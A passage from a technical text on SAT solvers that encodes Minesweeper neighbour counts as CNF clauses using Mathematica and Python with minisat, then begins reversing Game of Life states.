11.3 Cracking Minesweeper with SAT solver
SeealsoaboutcrackingitusingZ3: 5.11.
11.3.1 Simple population count function
Firstofall,somehowweneedtocountneighbourbombs.Thecountingfunctionissimilarto populationcount
function.
Wecantrytomake CNFexpressionusingWolframMathematica. Thiswillbeafunction,returning Trueif
anyof2bitsof8inputsbitsare Trueandothersare False. First,wemaketruthtableofsuchfunction:
In[]:= tbl2 =
Table[PadLeft[IntegerDigits[i, 2], 8] ->
If[Equal[DigitCount[i, 2][[1]], 2], 1, 0], {i, 0, 255}]
Out[]= {{0, 0, 0, 0, 0, 0, 0, 0} -> 0, {0, 0, 0, 0, 0, 0, 0, 1} -> 0,
{0, 0, 0, 0, 0, 0, 1, 0} -> 0, {0, 0, 0, 0, 0, 0, 1, 1} -> 1,
{0, 0, 0, 0, 0, 1, 0, 0} -> 0, {0, 0, 0, 0, 0, 1, 0, 1} -> 1,
{0, 0, 0, 0, 0, 1, 1, 0} -> 1, {0, 0, 0, 0, 0, 1, 1, 1} -> 0,
{0, 0, 0, 0, 1, 0, 0, 0} -> 0, {0, 0, 0, 0, 1, 0, 0, 1} -> 1,
{0, 0, 0, 0, 1, 0, 1, 0} -> 1, {0, 0, 0, 0, 1, 0, 1, 1} -> 0,
...
{1, 1, 1, 1, 1, 0, 1, 0} -> 0, {1, 1, 1, 1, 1, 0, 1, 1} -> 0,
{1, 1, 1, 1, 1, 1, 0, 0} -> 0, {1, 1, 1, 1, 1, 1, 0, 1} -> 0,
{1, 1, 1, 1, 1, 1, 1, 0} -> 0, {1, 1, 1, 1, 1, 1, 1, 1} -> 0}
Nowwecanmake CNFexpressionusingthistruthtable:
In[]:= BooleanConvert[
BooleanFunction[tbl2, {a, b, c, d, e, f, g, h}], "CNF"]
Out[]= (! a || ! b || ! c) && (! a || ! b || ! d) && (! a || !
b || ! e) && (! a || ! b || ! f) && (! a || ! b || ! g) && (!
a || ! b || ! h) && (! a || ! c || ! d) && (! a || ! c || !
e) && (! a || ! c || ! f) && (! a || ! c || ! g) && (! a || !
c || ! h) && (! a || ! d || ! e) && (! a || ! d || ! f) && (!
a || ! d || ! g) && (! a || ! d || ! h) && (! a || ! e || !
f) && (! a || ! e || ! g) && (! a || ! e || ! h) && (! a || !
f || ! g) && (! a || ! f || ! h) && (! a || ! g || ! h) && (a ||
b || c || d || e || f || g) && (a || b || c || d || e || f ||
h) && (a || b || c || d || e || g || h) && (a || b || c || d || f ||
g || h) && (a || b || c || e || f || g || h) && (a || b || d ||
e || f || g || h) && (a || c || d || e || f || g ||
h) && (! b || ! c || ! d) && (! b || ! c || ! e) && (! b || !
c || ! f) && (! b || ! c || ! g) && (! b || ! c || ! h) && (!
b || ! d || ! e) && (! b || ! d || ! f) && (! b || ! d || !
g) && (! b || ! d || ! h) && (! b || ! e || ! f) && (! b || !
e || ! g) && (! b || ! e || ! h) && (! b || ! f || ! g) && (!
b || ! f || ! h) && (! b || ! g || ! h) && (b || c || d || e ||
f || g ||
h) && (! c || ! d || ! e) && (! c || ! d || ! f) && (! c || !
d || ! g) && (! c || ! d || ! h) && (! c || ! e || ! f) && (!
128
c || ! e || ! g) && (! c || ! e || ! h) && (! c || ! f || !
g) && (! c || ! f || ! h) && (! c || ! g || ! h) && (! d || !
e || ! f) && (! d || ! e || ! g) && (! d || ! e || ! h) && (!
d || ! f || ! g) && (! d || ! f || ! h) && (! d || ! g || !
h) && (! e || ! f || ! g) && (! e || ! f || ! h) && (! e || !
g || ! h) && (! f || ! g || ! h)
ThesyntaxissimilartoC/C++. Let’scheckit.
IwroteaPythonfunctiontoconvertMathematica’soutputinto CNFfilewhichcanbefeededtoSATsolver:
#!/usr/bin/python
import subprocess
def mathematica_to_CNF (s, a):
s=s.replace("a", a[0]).replace("b", a[1]).replace("c", a[2]).replace("d", a[3])
s=s.replace("e", a[4]).replace("f", a[5]).replace("g", a[6]).replace("h", a[7])
s=s.replace("!", "-").replace("||", " ").replace("(", "").replace(")", "")
s=s.split ("&&")
return s
def POPCNT2 (a):
s="(!a||!b||!c)&&(!a||!b||!d)&&(!a||!b||!e)&&(!a||!b||!f)&&(!a||!b||!g)&&(!a||!b||!h)&&(!a||!c||!d)&&" \
"(!a||!c||!e)&&(!a||!c||!f)&&(!a||!c||!g)&&(!a||!c||!h)&&(!a||!d||!e)&&(!a||!d||!f)&&(!a||!d||!g)&&" \
"(!a||!d||!h)&&(!a||!e||!f)&&(!a||!e||!g)&&(!a||!e||!h)&&(!a||!f||!g)&&(!a||!f||!h)&&(!a||!g||!h)&&" \
"(a||b||c||d||e||f||g)&&(a||b||c||d||e||f||h)&&(a||b||c||d||e||g||h)&&(a||b||c||d||f||g||h)&&" \
"(a||b||c||e||f||g||h)&&(a||b||d||e||f||g||h)&&(a||c||d||e||f||g||h)&&(!b||!c||!d)&&(!b||!c||!e)&&" \
"(!b||!c||!f)&&(!b||!c||!g)&&(!b||!c||!h)&&(!b||!d||!e)&&(!b||!d||!f)&&(!b||!d||!g)&&(!b||!d||!h)&&" \
"(!b||!e||!f)&&(!b||!e||!g)&&(!b||!e||!h)&&(!b||!f||!g)&&(!b||!f||!h)&&(!b||!g||!h)&&(b||c||d||e||f||g||h)
&&" \
"(!c||!d||!e)&&(!c||!d||!f)&&(!c||!d||!g)&&(!c||!d||!h)&&(!c||!e||!f)&&(!c||!e||!g)&&(!c||!e||!h)&&" \
"(!c||!f||!g)&&(!c||!f||!h)&&(!c||!g||!h)&&(!d||!e||!f)&&(!d||!e||!g)&&(!d||!e||!h)&&(!d||!f||!g)&&" \
"(!d||!f||!h)&&(!d||!g||!h)&&(!e||!f||!g)&&(!e||!f||!h)&&(!e||!g||!h)&&(!f||!g||!h)"
return mathematica_to_CNF(s, a)
clauses=POPCNT2(["1","2","3","4","5","6","7","8"])
f=open("tmp.cnf", "w")
f.write ("p cnf 8 "+str(len(clauses))+"\n")
for c in clauses:
f.write(c+" 0\n")
f.close()
Itreplacesa/b/c/...variablestothevariablenamespassed(1/2/3...),reworkssyntax,etc.Hereisaresult:
p cnf 8 64
-1 -2 -3 0
-1 -2 -4 0
-1 -2 -5 0
-1 -2 -6 0
-1 -2 -7 0
-1 -2 -8 0
-1 -3 -4 0
-1 -3 -5 0
-1 -3 -6 0
-1 -3 -7 0
-1 -3 -8 0
-1 -4 -5 0
-1 -4 -6 0
-1 -4 -7 0
-1 -4 -8 0
-1 -5 -6 0
-1 -5 -7 0
-1 -5 -8 0
-1 -6 -7 0
-1 -6 -8 0
-1 -7 -8 0
1 2 3 4 5 6 7 0
1 2 3 4 5 6 8 0
1 2 3 4 5 7 8 0
1 2 3 4 6 7 8 0
1 2 3 5 6 7 8 0
1 2 4 5 6 7 8 0
1 3 4 5 6 7 8 0
-2 -3 -4 0
-2 -3 -5 0
129
-2 -3 -6 0
-2 -3 -7 0
-2 -3 -8 0
-2 -4 -5 0
-2 -4 -6 0
-2 -4 -7 0
-2 -4 -8 0
-2 -5 -6 0
-2 -5 -7 0
-2 -5 -8 0
-2 -6 -7 0
-2 -6 -8 0
-2 -7 -8 0
2 3 4 5 6 7 8 0
-3 -4 -5 0
-3 -4 -6 0
-3 -4 -7 0
-3 -4 -8 0
-3 -5 -6 0
-3 -5 -7 0
-3 -5 -8 0
-3 -6 -7 0
-3 -6 -8 0
-3 -7 -8 0
-4 -5 -6 0
-4 -5 -7 0
-4 -5 -8 0
-4 -6 -7 0
-4 -6 -8 0
-4 -7 -8 0
-5 -6 -7 0
-5 -6 -8 0
-5 -7 -8 0
-6 -7 -8 0
Icanrunit:
% minisat -verb=0 tst1.cnf results.txt
SATISFIABLE
% cat results.txt
SAT
1 -2 -3 -4 -5 -6 -7 8 0
Thevariablenameinresultslackingminussignis True. Variablenamewithminussignis False. Wesee
therearejusttwovariablesare True: 1and8. Thisisindeedcorrect: MiniSatsolverfoundacondition,for
whichourfunctionreturns True. Zeroattheendisjustaterminalsymbolwhichmeansnothing.
We can ask MiniSat for another solution, by adding current solution to the input CNF file, but with all
variablesnegated:
...
-5 -6 -8 0
-5 -7 -8 0
-6 -7 -8 0
-1 2 3 4 5 6 7 -8 0
InplainEnglishlanguage, thismeans“givemeANYsolutionwhichcansatisfyallclauses, butalsonot
equaltothelastclausewe’vejustadded”.
MiniSat,indeed,foundanothersolution,again,withonly2variablesequalto True:
% minisat -verb=0 tst2.cnf results.txt
SATISFIABLE
% cat results.txt
SAT
1 2 -3 -4 -5 -6 -7 -8 0
Bytheway,populationcount functionfor8neighbours(POPCNT8)inCNFformissimplest:
a&&b&&c&&d&&e&&f&&g&&h
Indeed: it’strueifall8inputbitsare True.
Thefunctionfor0neighbours(POPCNT0)isalsosimple:
130
!a&&!b&&!c&&!d&&!e&&!f&&!g&&!h
Itmeans,itwillreturn True,ifallinputvariablesare False.
Bytheway,POPCNT1functionisalsosimple:
(!a||!b)&&(!a||!c)&&(!a||!d)&&(!a||!e)&&(!a||!f)&&(!a||!g)&&(!a||!h)&&(a||b||c||d||e||f||g||h)&&
(!b||!c)&&(!b||!d)&&(!b||!e)&&(!b||!f)&&(!b||!g)&&(!b||!h)&&(!c||!d)&&(!c||!e)&&(!c||!f)&&(!c||!g)&&
(!c||!h)&&(!d||!e)&&(!d||!f)&&(!d||!g)&&(!d||!h)&&(!e||!f)&&(!e||!g)&&(!e||!h)&&(!f||!g)&&(!f||!h)&&(!g||!h)
Thereisjustenumerationofallpossiblepairsof8variables(a/b,a/c,a/d,etc),whichimplies:notwobits
mustbepresentsimultaneouslyineachpossiblepair. Andthereisanotherclause: “(a||b||c||d||e||f||g||h)”,
whichimplies: atleastonebitmustbepresentamong8variables.
Andyes,youcanaskMathematicaforfinding CNFexpressionsforanyothertruthtable.
11.3.2 Minesweeper
NowwecanuseMathematicatogenerateall populationcount functionsfor0..8neighbours.
For 99Minesweeper matrix including invisible border, there will be 1111 = 121variables, mapped to
Minesweepermatrixlikethis:
1 2 3 4 5 6 7 8 9 10 11
12 13 14 15 16 17 18 19 20 21 22
23 24 25 26 27 28 29 30 31 32 33
34 35 36 37 38 39 40 41 42 43 44
...
100 101 102 103 104 105 106 107 108 109 110
111 112 113 114 115 116 117 118 119 120 121
ThenwewriteaPythonscriptwhichstacksall populationcount functions: eachfunctionforeachknown
numberofneighbours(digitonMinesweeperfield). EachPOPCNTx()functiontakeslistofvariablenumbers
andoutputslistofclausestobeaddedtothefinal CNFfile.
Asofemptycells,wealsoaddthemasclauses,butwithminussign,whichmeans,thevariablemustbe
False. Wheneverwetrytoplacebomb, weadditsvariableasclausewithoutminussign, thismeansthe
variablemustbe True.
Thenweexecuteexternalminisatprocess. Theonlythingweneedfromitisexitcode. Ifaninput CNFis
UNSAT,itreturns20:
WeuseheretheinformationfromtheprevioussolvingofMinesweeper: 5.11.
#!/usr/bin/python
import subprocess
WIDTH=9
HEIGHT=9
VARS_TOTAL=(WIDTH+2)*(HEIGHT+2)
known=[
"01?10001?",
"01?100011",
"011100000",
"000000000",
"111110011",
"????1001?",
"????3101?",
"?????211?",
"?????????"]
def mathematica_to_CNF (s, a):
s=s.replace("a", a[0]).replace("b", a[1]).replace("c", a[2]).replace("d", a[3])
s=s.replace("e", a[4]).replace("f", a[5]).replace("g", a[6]).replace("h", a[7])
s=s.replace("!", "-").replace("||", " ").replace("(", "").replace(")", "")
s=s.split ("&&")
return s
def POPCNT0 (a):
s="!a&&!b&&!c&&!d&&!e&&!f&&!g&&!h"
return mathematica_to_CNF(s, a)
131
def POPCNT1 (a):
s="(!a||!b)&&(!a||!c)&&(!a||!d)&&(!a||!e)&&(!a||!f)&&(!a||!g)&&(!a||!h)&&(a||b||c||d||e||f||g||h)&&" \
"(!b||!c)&&(!b||!d)&&(!b||!e)&&(!b||!f)&&(!b||!g)&&(!b||!h)&&(!c||!d)&&(!c||!e)&&(!c||!f)&&(!c||!g)&&" \
"(!c||!h)&&(!d||!e)&&(!d||!f)&&(!d||!g)&&(!d||!h)&&(!e||!f)&&(!e||!g)&&(!e||!h)&&(!f||!g)&&(!f||!h)&&(!g
||!h)"
return mathematica_to_CNF(s, a)
def POPCNT2 (a):
s="(!a||!b||!c)&&(!a||!b||!d)&&(!a||!b||!e)&&(!a||!b||!f)&&(!a||!b||!g)&&(!a||!b||!h)&&(!a||!c||!d)&&" \
"(!a||!c||!e)&&(!a||!c||!f)&&(!a||!c||!g)&&(!a||!c||!h)&&(!a||!d||!e)&&(!a||!d||!f)&&(!a||!d||!g)&&" \
"(!a||!d||!h)&&(!a||!e||!f)&&(!a||!e||!g)&&(!a||!e||!h)&&(!a||!f||!g)&&(!a||!f||!h)&&(!a||!g||!h)&&" \
"(a||b||c||d||e||f||g)&&(a||b||c||d||e||f||h)&&(a||b||c||d||e||g||h)&&(a||b||c||d||f||g||h)&&" \
"(a||b||c||e||f||g||h)&&(a||b||d||e||f||g||h)&&(a||c||d||e||f||g||h)&&(!b||!c||!d)&&(!b||!c||!e)&&" \
"(!b||!c||!f)&&(!b||!c||!g)&&(!b||!c||!h)&&(!b||!d||!e)&&(!b||!d||!f)&&(!b||!d||!g)&&(!b||!d||!h)&&" \
"(!b||!e||!f)&&(!b||!e||!g)&&(!b||!e||!h)&&(!b||!f||!g)&&(!b||!f||!h)&&(!b||!g||!h)&&(b||c||d||e||f||g||h)
&&" \
"(!c||!d||!e)&&(!c||!d||!f)&&(!c||!d||!g)&&(!c||!d||!h)&&(!c||!e||!f)&&(!c||!e||!g)&&(!c||!e||!h)&&" \
"(!c||!f||!g)&&(!c||!f||!h)&&(!c||!g||!h)&&(!d||!e||!f)&&(!d||!e||!g)&&(!d||!e||!h)&&(!d||!f||!g)&&" \
"(!d||!f||!h)&&(!d||!g||!h)&&(!e||!f||!g)&&(!e||!f||!h)&&(!e||!g||!h)&&(!f||!g||!h)"
return mathematica_to_CNF(s, a)
def POPCNT3 (a):
s="(!a||!b||!c||!d)&&(!a||!b||!c||!e)&&(!a||!b||!c||!f)&&(!a||!b||!c||!g)&&(!a||!b||!c||!h)&&" \
"(!a||!b||!d||!e)&&(!a||!b||!d||!f)&&(!a||!b||!d||!g)&&(!a||!b||!d||!h)&&(!a||!b||!e||!f)&&" \
"(!a||!b||!e||!g)&&(!a||!b||!e||!h)&&(!a||!b||!f||!g)&&(!a||!b||!f||!h)&&(!a||!b||!g||!h)&&" \
"(!a||!c||!d||!e)&&(!a||!c||!d||!f)&&(!a||!c||!d||!g)&&(!a||!c||!d||!h)&&(!a||!c||!e||!f)&&" \
"(!a||!c||!e||!g)&&(!a||!c||!e||!h)&&(!a||!c||!f||!g)&&(!a||!c||!f||!h)&&(!a||!c||!g||!h)&&" \
"(!a||!d||!e||!f)&&(!a||!d||!e||!g)&&(!a||!d||!e||!h)&&(!a||!d||!f||!g)&&(!a||!d||!f||!h)&&" \
"(!a||!d||!g||!h)&&(!a||!e||!f||!g)&&(!a||!e||!f||!h)&&(!a||!e||!g||!h)&&(!a||!f||!g||!h)&&" \
"(a||b||c||d||e||f)&&(a||b||c||d||e||g)&&(a||b||c||d||e||h)&&(a||b||c||d||f||g)&&(a||b||c||d||f||h)&&" \
"(a||b||c||d||g||h)&&(a||b||c||e||f||g)&&(a||b||c||e||f||h)&&(a||b||c||e||g||h)&&(a||b||c||f||g||h)&&" \
"(a||b||d||e||f||g)&&(a||b||d||e||f||h)&&(a||b||d||e||g||h)&&(a||b||d||f||g||h)&&(a||b||e||f||g||h)&&" \
"(a||c||d||e||f||g)&&(a||c||d||e||f||h)&&(a||c||d||e||g||h)&&(a||c||d||f||g||h)&&(a||c||e||f||g||h)&&" \
"(a||d||e||f||g||h)&&(!b||!c||!d||!e)&&(!b||!c||!d||!f)&&(!b||!c||!d||!g)&&(!b||!c||!d||!h)&&" \
"(!b||!c||!e||!f)&&(!b||!c||!e||!g)&&(!b||!c||!e||!h)&&(!b||!c||!f||!g)&&(!b||!c||!f||!h)&&" \
"(!b||!c||!g||!h)&&(!b||!d||!e||!f)&&(!b||!d||!e||!g)&&(!b||!d||!e||!h)&&(!b||!d||!f||!g)&&" \
"(!b||!d||!f||!h)&&(!b||!d||!g||!h)&&(!b||!e||!f||!g)&&(!b||!e||!f||!h)&&(!b||!e||!g||!h)&&" \
"(!b||!f||!g||!h)&&(b||c||d||e||f||g)&&(b||c||d||e||f||h)&&(b||c||d||e||g||h)&&(b||c||d||f||g||h)&&" \
"(b||c||e||f||g||h)&&(b||d||e||f||g||h)&&(!c||!d||!e||!f)&&(!c||!d||!e||!g)&&(!c||!d||!e||!h)&&" \
"(!c||!d||!f||!g)&&(!c||!d||!f||!h)&&(!c||!d||!g||!h)&&(!c||!e||!f||!g)&&(!c||!e||!f||!h)&&" \
"(!c||!e||!g||!h)&&(!c||!f||!g||!h)&&(c||d||e||f||g||h)&&(!d||!e||!f||!g)&&(!d||!e||!f||!h)&&" \
"(!d||!e||!g||!h)&&(!d||!f||!g||!h)&&(!e||!f||!g||!h)"
return mathematica_to_CNF(s, a)
def POPCNT4 (a):
s="(!a||!b||!c||!d||!e)&&(!a||!b||!c||!d||!f)&&(!a||!b||!c||!d||!g)&&(!a||!b||!c||!d||!h)&&" \
"(!a||!b||!c||!e||!f)&&(!a||!b||!c||!e||!g)&&(!a||!b||!c||!e||!h)&&(!a||!b||!c||!f||!g)&&" \
"(!a||!b||!c||!f||!h)&&(!a||!b||!c||!g||!h)&&(!a||!b||!d||!e||!f)&&(!a||!b||!d||!e||!g)&&" \
"(!a||!b||!d||!e||!h)&&(!a||!b||!d||!f||!g)&&(!a||!b||!d||!f||!h)&&(!a||!b||!d||!g||!h)&&" \
"(!a||!b||!e||!f||!g)&&(!a||!b||!e||!f||!h)&&(!a||!b||!e||!g||!h)&&(!a||!b||!f||!g||!h)&&" \
"(!a||!c||!d||!e||!f)&&(!a||!c||!d||!e||!g)&&(!a||!c||!d||!e||!h)&&(!a||!c||!d||!f||!g)&&" \
"(!a||!c||!d||!f||!h)&&(!a||!c||!d||!g||!h)&&(!a||!c||!e||!f||!g)&&(!a||!c||!e||!f||!h)&&" \
"(!a||!c||!e||!g||!h)&&(!a||!c||!f||!g||!h)&&(!a||!d||!e||!f||!g)&&(!a||!d||!e||!f||!h)&&" \
"(!a||!d||!e||!g||!h)&&(!a||!d||!f||!g||!h)&&(!a||!e||!f||!g||!h)&&(a||b||c||d||e)&&(a||b||c||d||f)&&" \
"(a||b||c||d||g)&&(a||b||c||d||h)&&(a||b||c||e||f)&&(a||b||c||e||g)&&(a||b||c||e||h)&&(a||b||c||f||g)&&" \
"(a||b||c||f||h)&&(a||b||c||g||h)&&(a||b||d||e||f)&&(a||b||d||e||g)&&(a||b||d||e||h)&&(a||b||d||f||g)&&" \
"(a||b||d||f||h)&&(a||b||d||g||h)&&(a||b||e||f||g)&&(a||b||e||f||h)&&(a||b||e||g||h)&&(a||b||f||g||h)&&" \
"(a||c||d||e||f)&&(a||c||d||e||g)&&(a||c||d||e||h)&&(a||c||d||f||g)&&(a||c||d||f||h)&&(a||c||d||g||h)&&" \
"(a||c||e||f||g)&&(a||c||e||f||h)&&(a||c||e||g||h)&&(a||c||f||g||h)&&(a||d||e||f||g)&&(a||d||e||f||h)&&" \
"(a||d||e||g||h)&&(a||d||f||g||h)&&(a||e||f||g||h)&&(!b||!c||!d||!e||!f)&&(!b||!c||!d||!e||!g)&&" \
"(!b||!c||!d||!e||!h)&&(!b||!c||!d||!f||!g)&&(!b||!c||!d||!f||!h)&&(!b||!c||!d||!g||!h)&&" \
"(!b||!c||!e||!f||!g)&&(!b||!c||!e||!f||!h)&&(!b||!c||!e||!g||!h)&&(!b||!c||!f||!g||!h)&&" \
"(!b||!d||!e||!f||!g)&&(!b||!d||!e||!f||!h)&&(!b||!d||!e||!g||!h)&&(!b||!d||!f||!g||!h)&&" \
"(!b||!e||!f||!g||!h)&&(b||c||d||e||f)&&(b||c||d||e||g)&&(b||c||d||e||h)&&(b||c||d||f||g)&&" \
"(b||c||d||f||h)&&(b||c||d||g||h)&&(b||c||e||f||g)&&(b||c||e||f||h)&&(b||c||e||g||h)&&" \
"(b||c||f||g||h)&&(b||d||e||f||g)&&(b||d||e||f||h)&&(b||d||e||g||h)&&(b||d||f||g||h)&&" \
"(b||e||f||g||h)&&(!c||!d||!e||!f||!g)&&(!c||!d||!e||!f||!h)&&(!c||!d||!e||!g||!h)&&" \
"(!c||!d||!f||!g||!h)&&(!c||!e||!f||!g||!h)&&(c||d||e||f||g)&&(c||d||e||f||h)&&(c||d||e||g||h)&&" \
"(c||d||f||g||h)&&(c||e||f||g||h)&&(!d||!e||!f||!g||!h)&&(d||e||f||g||h)"
return mathematica_to_CNF(s, a)
def POPCNT5 (a):
s="(!a||!b||!c||!d||!e||!f)&&(!a||!b||!c||!d||!e||!g)&&(!a||!b||!c||!d||!e||!h)&&" \
"(!a||!b||!c||!d||!f||!g)&&(!a||!b||!c||!d||!f||!h)&&(!a||!b||!c||!d||!g||!h)&&" \
"(!a||!b||!c||!e||!f||!g)&&(!a||!b||!c||!e||!f||!h)&&(!a||!b||!c||!e||!g||!h)&&" \
"(!a||!b||!c||!f||!g||!h)&&(!a||!b||!d||!e||!f||!g)&&(!a||!b||!d||!e||!f||!h)&&" \
132
"(!a||!b||!d||!e||!g||!h)&&(!a||!b||!d||!f||!g||!h)&&(!a||!b||!e||!f||!g||!h)&&" \
"(!a||!c||!d||!e||!f||!g)&&(!a||!c||!d||!e||!f||!h)&&(!a||!c||!d||!e||!g||!h)&&" \
"(!a||!c||!d||!f||!g||!h)&&(!a||!c||!e||!f||!g||!h)&&(!a||!d||!e||!f||!g||!h)&&" \
"(a||b||c||d)&&(a||b||c||e)&&(a||b||c||f)&&(a||b||c||g)&&(a||b||c||h)&&(a||b||d||e)&&" \
"(a||b||d||f)&&(a||b||d||g)&&(a||b||d||h)&&(a||b||e||f)&&(a||b||e||g)&&(a||b||e||h)&&" \
"(a||b||f||g)&&(a||b||f||h)&&(a||b||g||h)&&(a||c||d||e)&&(a||c||d||f)&&(a||c||d||g)&&" \
"(a||c||d||h)&&(a||c||e||f)&&(a||c||e||g)&&(a||c||e||h)&&(a||c||f||g)&&(a||c||f||h)&&" \
"(a||c||g||h)&&(a||d||e||f)&&(a||d||e||g)&&(a||d||e||h)&&(a||d||f||g)&&(a||d||f||h)&&" \
"(a||d||g||h)&&(a||e||f||g)&&(a||e||f||h)&&(a||e||g||h)&&(a||f||g||h)&&(!b||!c||!d||!e||!f||!g)&&" \
"(!b||!c||!d||!e||!f||!h)&&(!b||!c||!d||!e||!g||!h)&&(!b||!c||!d||!f||!g||!h)&&" \
"(!b||!c||!e||!f||!g||!h)&&(!b||!d||!e||!f||!g||!h)&&(b||c||d||e)&&(b||c||d||f)&&" \
"(b||c||d||g)&&(b||c||d||h)&&(b||c||e||f)&&(b||c||e||g)&&(b||c||e||h)&&(b||c||f||g)&&" \
"(b||c||f||h)&&(b||c||g||h)&&(b||d||e||f)&&(b||d||e||g)&&(b||d||e||h)&&(b||d||f||g)&&" \
"(b||d||f||h)&&(b||d||g||h)&&(b||e||f||g)&&(b||e||f||h)&&(b||e||g||h)&&(b||f||g||h)&&" \
"(!c||!d||!e||!f||!g||!h)&&(c||d||e||f)&&(c||d||e||g)&&(c||d||e||h)&&(c||d||f||g)&&" \
"(c||d||f||h)&&(c||d||g||h)&&(c||e||f||g)&&(c||e||f||h)&&(c||e||g||h)&&(c||f||g||h)&&" \
"(d||e||f||g)&&(d||e||f||h)&&(d||e||g||h)&&(d||f||g||h)&&(e||f||g||h)"
return mathematica_to_CNF(s, a)
def POPCNT6 (a):
s="(!a||!b||!c||!d||!e||!f||!g)&&(!a||!b||!c||!d||!e||!f||!h)&&(!a||!b||!c||!d||!e||!g||!h)&&" \
"(!a||!b||!c||!d||!f||!g||!h)&&(!a||!b||!c||!e||!f||!g||!h)&&(!a||!b||!d||!e||!f||!g||!h)&&" \
"(!a||!c||!d||!e||!f||!g||!h)&&(a||b||c)&&(a||b||d)&&(a||b||e)&&(a||b||f)&&(a||b||g)&&(a||b||h)&&" \
"(a||c||d)&&(a||c||e)&&(a||c||f)&&(a||c||g)&&(a||c||h)&&(a||d||e)&&(a||d||f)&&(a||d||g)&&" \
"(a||d||h)&&(a||e||f)&&(a||e||g)&&(a||e||h)&&(a||f||g)&&(a||f||h)&&(a||g||h)&&" \
"(!b||!c||!d||!e||!f||!g||!h)&&(b||c||d)&&(b||c||e)&&(b||c||f)&&(b||c||g)&&(b||c||h)&&(b||d||e)&&" \
"(b||d||f)&&(b||d||g)&&(b||d||h)&&(b||e||f)&&(b||e||g)&&(b||e||h)&&(b||f||g)&&(b||f||h)&&(b||g||h)&&" \
"(c||d||e)&&(c||d||f)&&(c||d||g)&&(c||d||h)&&(c||e||f)&&(c||e||g)&&(c||e||h)&&(c||f||g)&&(c||f||h)&&" \
"(c||g||h)&&(d||e||f)&&(d||e||g)&&(d||e||h)&&(d||f||g)&&(d||f||h)&&(d||g||h)&&" \
"(e||f||g)&&(e||f||h)&&(e||g||h)&&(f||g||h)"
return mathematica_to_CNF(s, a)
def POPCNT7 (a):
s="(!a||!b||!c||!d||!e||!f||!g||!h)&&(a||b)&&(a||c)&&(a||d)&&(a||e)&&(a||f)&&(a||g)&&(a||h)&&(b||c)&&" \
"(b||d)&&(b||e)&&(b||f)&&(b||g)&&(b||h)&&(c||d)&&(c||e)&&(c||f)&&(c||g)&&(c||h)&&(d||e)&&(d||f)&&(d||g)&&"
\
"(d||h)&&(e||f)&&(e||g)&&(e||h)&&(f||g)&&(f||h)&&(g||h)"
return mathematica_to_CNF(s, a)
def POPCNT8 (a):
s="a&&b&&c&&d&&e&&f&&g&&h"
return mathematica_to_CNF(s, a)
POPCNT_functions=[POPCNT0, POPCNT1, POPCNT2, POPCNT3, POPCNT4, POPCNT5, POPCNT6, POPCNT7, POPCNT8]
def coords_to_var (row, col):
# we always use SAT variables as strings, anyway.
# the 1st variables is 1, not 0
return str(row*(WIDTH+2)+col+1)
def chk_bomb(row, col):
clauses=[]
# make empty border
# all variables are negated (because they must be False)
for c in range(WIDTH+2):
clauses.append ("-"+coords_to_var(0,c))
clauses.append ("-"+coords_to_var(HEIGHT+1,c))
for r in range(HEIGHT+2):
clauses.append ("-"+coords_to_var(r,0))
clauses.append ("-"+coords_to_var(r,WIDTH+1))
for r in range(1,HEIGHT+1):
for c in range(1,WIDTH+1):
t=known[r-1][c-1]
if t in "012345678":
# cell at r, c is empty (False):
clauses.append ("-"+coords_to_var(r,c))
# we need an empty border so the following expression would work for all possible cells:
neighbours=[coords_to_var(r-1, c-1), coords_to_var(r-1, c), coords_to_var(r-1, c+1),
coords_to_var(r, c-1),
coords_to_var(r, c+1), coords_to_var(r+1, c-1), coords_to_var(r+1, c), coords_to_var(r
+1, c+1)]
clauses=clauses+POPCNT_functions[int(t)](neighbours)
# place a bomb
133
clauses.append (coords_to_var(row,col))
f=open("tmp.cnf", "w")
f.write ("p cnf "+str(VARS_TOTAL)+" "+str(len(clauses))+"\n")
for c in clauses:
f.write(c+" 0\n")
f.close()
child = subprocess.Popen(["minisat", "tmp.cnf"], stdout=subprocess.PIPE)
child.wait()
# 10 is SAT, 20 is UNSAT
if child.returncode==20:
print "row=%d, col=%d, unsat!" % (row, col)
for r in range(1,HEIGHT+1):
for c in range(1,WIDTH+1):
if known[r-1][c-1]=="?":
chk_bomb(r, c)
(https://github.com/dennis714/SAT_SMT_article/blob/master/SAT/minesweeper/minesweeper_SAT.
py)
The outputCNFfile can be large, up to 2000clauses, or more, here is an example: https://github.
com/dennis714/SAT_SMT_article/blob/master/SAT/minesweeper/sample.cnf .
Anyway,itworksjustlikemypreviousZ3Pyscript:
row=1, col=3, unsat!
row=6, col=2, unsat!
row=6, col=3, unsat!
row=7, col=4, unsat!
row=7, col=9, unsat!
row=8, col=9, unsat!
...butitrunswayfaster,evenconsideringoverheadofexecutingexternalprogram.Perhaps,Z3Pyversion
couldbeoptimizedmuchbetter?
Thefiles,includingWolframMathematicanotebook: https://github.com/dennis714/SAT_SMT_article/
tree/master/SAT/minesweeper .
11.4 Conway’s “Game of Life”
11.4.1 Reversing back state of “Game of Life”
HowcouldwereversebackaknownstateofGoL?Thiscanbesolvedbybrute-force,butthisisextremely
slowandinefficient.
Let’strytouseSATsolver.
First,weneedtodefineafunctionwhichwilltell,ifthenewcellwillbecreated/born,preserved/stayor
died.Quickrefresher:cellisbornifithas3neighbours,itstaysaliveifithas2or3neighbours,itdiesinany
othercase.
ThisishowIcandefineafunctionreflectingstateofanewcellinthenextstate:
if center==true:
return popcnt2(neighbours) || popcnt3(neighbours)
if center==false
return popcnt3(neighbours)
Wecangetridof“if”construction:
result=(center=true && (popcnt2(neighbours) || popcnt3(neighbours))) || (center=false && popcnt3(neighbours))
...where“center”isstateofcentralcell,“neighbours”are8neighbouringcells,popcnt2isafunctionwhich
returnsTrueifithasexactly2bitsoninput,popcnt3isthesame,butfor3bits(justlikethesewereusedin
my“Minesweeper”example( 11.3)).
UsingWolframMathematica,Ifirstcreateallhelperfunctionsandtruthtableforthefunction,whichreturns
true,ifacellmustbepresentinthenextstate,or falseifnot:
In[1]:= popcount[n_Integer]:=IntegerDigits[n,2] // Total
In[2]:= popcount2[n_Integer]:=Equal[popcount[n],2]
In[3]:= popcount3[n_Integer]:=Equal[popcount[n],3]
134
In[4]:= newcell[center_Integer,neighbours_Integer]:=(center==1 && (popcount2[neighbours]|| popcount3[neighbours
]))||
(center==0 && popcount3[neighbours])
In[13]:= NewCellIsTrue=Flatten[Table[Join[{center},PadLeft[IntegerDigits[neighbours,2],8]] ->
Boole[newcell[center, neighbours]],{neighbours,0,255},{center,0,1}]]
Out[13]= {{0,0,0,0,0,0,0,0,0}->0,
